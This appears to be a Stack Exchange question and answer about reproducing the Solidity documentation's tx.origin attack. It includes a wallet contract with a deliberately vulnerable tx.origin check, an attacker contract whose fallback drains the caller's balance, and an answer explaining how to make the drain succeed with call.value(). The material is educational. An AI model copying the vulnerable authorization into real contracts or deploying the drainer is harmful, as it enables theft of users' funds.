# Unable to replicate tx.origin attack

Tags: solidity, contract-development, remix, dapps, contract-debugging

I was reading the solidity docs and decided to replicate [tx.origin attack](http://solidity.readthedocs.io/en/develop/security-considerations.html#tx-origin)
. I copied the contract from the documentation but I end up with error when using the function "transferTo". Check the remix screenshot below for the error details.

Find my contract below.

```
// THIS CONTRACT CONTAINS A BUG - DO NOT USE
contract TxUserWallet {
    address owner;

    function TxUserWallet() payable public  {
        owner = msg.sender;
    }

    function transferTo(address dest, uint256 amount) payable public {

        require(tx.origin == owner);
        dest.transfer(amount);
    }

    function getBalance() constant returns(uint256){
        return this.balance;
    }

    function getOwner() constant returns(address){
       return owner;
    }
}


interface TxUserWallet {
    function transferTo(address dest, uint amount) public;
}

contract TxAttackWallet {
    address owner;

    function TxAttackWallet() payable public  {
        owner = msg.sender;
    }

    function() payable public {
        TxUserWallet(msg.sender).transferTo(owner, msg.sender.balance);
    }

    function getBalance() constant returns(uint256){
        return this.balance;
    }

    function getOwner() constant returns(address){
       return owner;
    }


}
```

[image]

Answer (score 3):

It is bad idea to rely on tx.origin to determine if transaction was originated by a trusted party or not. This is that chapter of Solidity doc tells you about. The vulnerable piece of code is `require(tx.origin == owner);`.

Now, to actually exploit that tx.origin flaw, a reentrancy attack is attempted, but fails because nowadays `dest.transfer(amount);` does only sends 2300 gas to the fallback function of `dest` contract.

To observe abuse of tx.origin-based security control (disregarding new behavior of transfer() which breaks reentrancy trick) you can change `dest.transfer(amount);` to `dest.call.value(amount)()`. Like here https://github.com/abbbe/txorigin/blob/master/contracts/TxUserWallet.sol#L14.

And, from the screenshot it is not clear if you correctly trigger the attack. You have to call `TxUserWallet.transferTo(ADDR_OF_TxAttacWallet, 1)` from TxUserWallet's owner account. This will send all funds from TxUserWallet to the *owner* of TxAttackWallet.